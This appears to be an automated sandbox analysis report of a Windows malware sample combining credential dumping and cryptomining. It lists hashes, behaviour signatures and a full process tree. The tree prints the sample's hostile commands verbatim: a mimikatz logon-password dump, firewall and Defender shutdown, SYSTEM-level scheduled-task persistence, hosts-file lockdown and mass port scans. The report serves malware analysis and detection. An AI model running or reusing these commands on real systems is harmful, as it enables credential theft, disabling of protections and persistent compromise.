Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2024 13:02

General

  • Target

    2024-10-23_c565963ca563e2df18b05a67bb1f0d5d_hacktools_icedid_mimikatz.exe

  • Size

    11.0MB

  • MD5

    c565963ca563e2df18b05a67bb1f0d5d

  • SHA1

    15fe65ca6a54d89d32dbaeb7911e2b52411e220b

  • SHA256

    4bdd053a3ba46c6130cba9d824bfd411c4bb726b0578aea8d6fffc01c2462c1b

  • SHA512

    b7a8fdf69472381c0a3f01a553787cc1681395f8ba64972dccca2ea62353b80ca3f255a0e8fbb5afc3f7af12fe72560828b561b81729493e74ac85ceab877a95

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (27338) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2144
      • C:\Windows\TEMP\dvfzrticv\lfbpkn.exe
        "C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3124
    • C:\Users\Admin\AppData\Local\Temp\2024-10-23_c565963ca563e2df18b05a67bb1f0d5d_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-23_c565963ca563e2df18b05a67bb1f0d5d_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1084
        • C:\Windows\cbdnbivt\tmyfwky.exe
          C:\Windows\cbdnbivt\tmyfwky.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1056
    • C:\Windows\cbdnbivt\tmyfwky.exe
      C:\Windows\cbdnbivt\tmyfwky.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:8
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:916
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2788
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:1444
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4868
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1112
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3096
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2792
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:5032
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3384
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4368
              • C:\Windows\itcctjlje\unptrtjvi\wpcap.exe
                C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:444
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3896
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2720
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4544
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:804
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2692
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                      PID:1900
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1452
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4580
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4928
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4704
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4284
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1536
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2332
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:4912
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3476
                  • C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe
                    C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3988
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1960
                  • C:\Windows\itcctjlje\Corporate\vfshost.exe
                    C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4856
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1888
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:1648
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4860
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
                    2⤵
                      PID:1976
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3512
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:3056
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4520
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4584
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1948
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:684
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3112
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2640
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1692
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4276
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4284
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:452
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2816
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3176
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4952
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1944
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4960
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3128
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3512
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3056
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:460
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:408
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4100
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1560
                    • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                      C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 812 C:\Windows\TEMP\itcctjlje\812.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4656
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                        PID:4364
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4420
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4704
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1960
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                            PID:3108
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2464
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3052
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                              PID:4284
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3860
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4036
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:4044
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2812
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:1504
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1328
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2332
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                              PID:4520
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                PID:3452
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetWindowsHookEx
                              PID:2096
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 388 C:\Windows\TEMP\itcctjlje\388.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:740
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2144 C:\Windows\TEMP\itcctjlje\2144.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2692
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2684 C:\Windows\TEMP\itcctjlje\2684.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              PID:1888
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2960 C:\Windows\TEMP\itcctjlje\2960.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1452
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2968 C:\Windows\TEMP\itcctjlje\2968.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1692
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2836 C:\Windows\TEMP\itcctjlje\2836.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4656
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3772 C:\Windows\TEMP\itcctjlje\3772.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3092
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3864 C:\Windows\TEMP\itcctjlje\3864.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3176
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3928 C:\Windows\TEMP\itcctjlje\3928.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:732
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 4060 C:\Windows\TEMP\itcctjlje\4060.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4584
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3964 C:\Windows\TEMP\itcctjlje\3964.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1208
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3976 C:\Windows\TEMP\itcctjlje\3976.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2640
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2992 C:\Windows\TEMP\itcctjlje\2992.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1560
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2740 C:\Windows\TEMP\itcctjlje\2740.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4400
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 4768 C:\Windows\TEMP\itcctjlje\4768.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4484
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 1436 C:\Windows\TEMP\itcctjlje\1436.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2912
                            • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                              C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2980 C:\Windows\TEMP\itcctjlje\2980.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1556
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\itcctjlje\unptrtjvi\scan.bat
                              2⤵
                                PID:4256
                                • C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe
                                  midctcinn.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:2976
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2792
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:4980
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1676
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:6132
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                    3⤵
                                      PID:6004
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:6504
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3680
                                • C:\Windows\SysWOW64\skaigk.exe
                                  C:\Windows\SysWOW64\skaigk.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1816
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tmyfwky.exe
                                  1⤵
                                    PID:1188
                                    • C:\Windows\ime\tmyfwky.exe
                                      C:\Windows\ime\tmyfwky.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3136
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
                                    1⤵
                                      PID:4660
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:5020
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
                                          2⤵
                                            PID:2892
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
                                          1⤵
                                            PID:2324
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:3660
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
                                                2⤵
